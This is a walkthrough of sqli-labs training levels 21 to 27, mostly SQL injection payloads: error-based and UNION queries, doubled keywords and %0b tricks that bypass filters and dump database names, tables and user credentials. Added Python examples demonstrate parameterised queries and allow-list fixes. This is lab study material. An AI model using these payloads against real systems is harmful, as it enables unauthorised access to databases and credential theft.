(Note: for some levels the answer is attached directly after the steps.)
Less 21
First find the account and password.
Then log in with Firefox, intercept with Burp, and then:
Dump the database name
1' or updatexml(1,concat(0x7e,(database())),0) or '
Base64-encode it with the Xiaokui (小葵) converter and send it.
After refreshing the page, intercept again with Burp.
Dump the table names
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
Dump the column names
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
Dump the field contents
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 22
First find the account and password.
Then log in with Firefox, intercept with Burp, and then:
Dump the database name
1"or updatexml(1,concat(0x7e,(database())),0) or "
Base64-encode it with the Xiaokui (小葵) converter and send it.
After refreshing the page, intercept again with Burp.
Dump the table names
1"or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or "
1" or 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23
Dump the column names
1"or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or "
Dump the field contents
1" or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or "
Less 23
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
It filters # and --, which amounts to replacing them with the empty string.
?id=-1' union select 1,database(),'3
A few points to explain here:
id=-1: why -1? Because the SQL statement ends up running two SELECTs: the first is the lookup by id, the second is the SELECT we construct. Only one row can be displayed, so for our constructed row to be output the first SELECT must return nothing; -1, or any id beyond the data in the table, works.
-1' union select 1,database(),'3: the first single quote closes -1, the second closes the quote that follows in the original query. The query result is then displayed in the username position.
Error-based and time-based injection also work here, and or '1'='1 can be used to close the quote.
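To make the point about the first SELECT concrete, and to show the fix, here is an added example (not from the original write-up and not sqli-labs code). It assumes the lookup has the shape SELECT * FROM users WHERE id='…' LIMIT 0,1, uses an in-memory SQLite table with constructed rows as a stand-in for MySQL's security.users, and uses sqlite_version() in place of database(). The concatenated query returns only the injected row; the parameterised query, given the same input, returns nothing.

```python
import sqlite3

# Constructed sample rows standing in for sqli-labs' security.users table.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db():
    """In-memory SQLite database (MySQL stand-in) with a 3-column users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by string concatenation, the pattern behind the level.
    The input is pasted into the SQL text, so any quotes and keywords in it
    become part of the statement; LIMIT 0,1 then shows whichever row comes
    first, which is why a non-existent id makes the UNION row the only row."""
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed
    as SQL, so a quote or a UNION inside it is just part of the compared string."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "-1' union select 1,sqlite_version(),'3"   # page payload, adapted to SQLite
    print("concatenated:", lookup_vulnerable(db, probe))
    print("parameterised:", lookup_parameterised(db, probe))
```

Note that with id=1 instead of -1 the result order of a UNION is not guaranteed, so the real row and the injected row compete for the single LIMIT slot; the parameterised version removes the problem entirely rather than relying on that.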
Union query
Get the databases:
?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
List the tables in the security database:
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
Read columns from the users table:
?id=-1' union select 1,(select group_concat(username) from security.users limit 0,1),'3
?id=-1' union select 1,(select group_concat(password) from security.users limit 0,1),'3
Error-based, ' type
Dump the database
1' or updatexml(1,concat(0x7e,(database())),0) or '
Dump the table names
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
Dump the column names
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
Dump the field contents
1' or updatexml(1,concat(0x23,(select group_concat(id,username,0x23,password)from security.users)),0) or '
Less 24
In this level, register first.
Use admin'or 1# as the username, then set a password.
Then change the password, and log in as admin with the new password.
Less 25
In this level or and and are filtered, so doubled keywords are used (with a union query).
?id=1'aandnd 1=1%23
?id=1'oorrder by 3%23
Find the display positions
id=1' aandnd 1=2 union select 1,2,3%23
Dump the database
id=1' aandnd 1=2 union select 1,database(),3%23
Dump the tables
id=1' aandnd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
Dump the column names
id=1' aandnd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users'%23
Dump the field contents
id=1' aandnd 1=2 union select 1,2,group_concat(username,0x23,passwoorrd) from security.users%23
Less 26
Confirm what is filtered
Filtered: or, and, /*, --, #, and spaces
Confirm # is filtered
http://localhost/sqli-labs/Less-26/?id=%231
Confirm or is filtered
http://localhost/sqli-labs/Less-26/?id=or1
Confirm the multi-line comment marker is filtered
http://localhost/sqli-labs/Less-26/?id=/*1
Confirm the single-line comment marker is filtered
http://localhost/sqli-labs/Less-26/?id=--1
Confirm the slash is filtered
http://localhost/sqli-labs/Less-26/?id=/1
Confirm the backslash is filtered
http://localhost/sqli-labs/Less-26/?id=1\
Confirm spaces are filtered
http://localhost/sqli-labs/Less-26/?id=1' ' '
Note: since spaces are filtered, %0b (vertical tab) is used in their place.
Union query
Find the display positions
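Why the doubled keywords of Less 25 and the %0b of Less 26 get past a keyword blacklist, and the allow-list check that actually closes the hole, as an added example (not the sqli-labs source; the filter below is a reconstruction from the tokens listed above, and the function names are my own):

```python
import re
from urllib.parse import unquote

# Tokens the level strips, as listed above. Single-pass removal, the way a
# preg_replace-style blacklist behaves. Reconstructed for this demonstration,
# not the sqli-labs source.
BLACKLIST = ["or", "and", "/*", "--", "#", " "]


def blacklist_filter(value):
    """Remove every blacklisted token once, case-insensitively.
    Characters left behind by a removal are not rescanned, so 'aandnd'
    collapses to 'and' and 'oorr' to 'or': the filter is not idempotent."""
    for token in BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def fixed_point_filter(value):
    """Stronger variant: repeat until nothing changes. This defeats doubled
    keywords, but other whitespace such as vertical tab (0x0B) still passes,
    and MySQL accepts it as a separator just like a space."""
    while True:
        stripped = blacklist_filter(value)
        if stripped == value:
            return value
        value = stripped


def filter_url_param(raw):
    """Apply the blacklist to a raw query-string value after %xx decoding,
    which is the form in which the server sees the requests above."""
    return blacklist_filter(unquote(raw))


def validate_id(raw):
    """Allow-list mitigation: `id` must be a short string of decimal digits.
    Returns the integer, or None to reject. No payload on this page survives,
    because none of them consists only of digits; combined with a
    parameterised query this removes the need for a keyword blacklist."""
    value = unquote(raw)
    if re.fullmatch(r"[0-9]{1,10}", value):
        return int(value)
    return None


if __name__ == "__main__":
    sample = "1'aandnd%0b1=2"   # constructed, modelled on the requests above
    print(repr(filter_url_param(sample)))      # doubled keyword survives as 'and'
    print(repr(fixed_point_filter(unquote(sample))))  # keyword gone, 0x0B remains
    print(validate_id(sample), validate_id("1"))      # None, 1
```

The two filter functions show the two separate weaknesses (non-idempotent stripping and an incomplete whitespace list); validate_id shows that restricting the parameter to what it is supposed to be is both simpler and complete.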
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,2,3%0boorr%0b'1
Dump the database
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,database(),version()%0boorr%0b'1
Dump the table names
id=1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(table_name)%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security
Dump the column names
1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(column_name)%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users
Dump the fields
1'aandnd%0b1=2%0bunion%0bselect%0b1,2,group_concat(username,0x23,passwoorrd)%0bfrom%0bsecurity.users%0bwhere'1'='1
xpath (error-based)
Dump the database
id=1'aandnd%0bupdatexml(1,concat(0x23,database()),1)%0b%0boorr%0b'1
Dump the table names
id=1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(table_name)%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security')),1)%0b%0boorr%0b'1
Dump the column names
id=1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(column_name)%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'aandnd%0btable_name='users')),1)%0b%0boorr%0b'1
Dump the fields
1'aandnd%0bupdatexml(1,concat(0x23,(select%0bgroup_concat(username,0x23,passwoorrd)from%0bsecurity.users)),1)%0b%0boorr%0b'1
Less 27
Filtered: select, union, and spaces
Dump the database
1'and%0b1=2%0bUnIon%0bSeLect%0b1,database(),3%0bor%0b'1
Dump the table names
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security
Dump the column names
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(column_name),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0band%0btable_name='users
Dump the field contents
1'and%0b1=2%0bUnIon%0bSeLect%0b1,group_concat(username,0x23,password),3%0bfrom%0bsecurity.users%0bwhere%0b'1
Or, error-based:
1'and%0bupdatexml(1,concat(0x23,(SeLect%0bgroup_concat(username,0x23,password)from%0bsecurity.users)),1)%0b%0bor%0b'1
Less 1-10 write-up: https://blog.csdn.net/S123KO/article/details/100048575
Less 11-20 write-up: https://blog.csdn.net/S123KO/article/details/100048614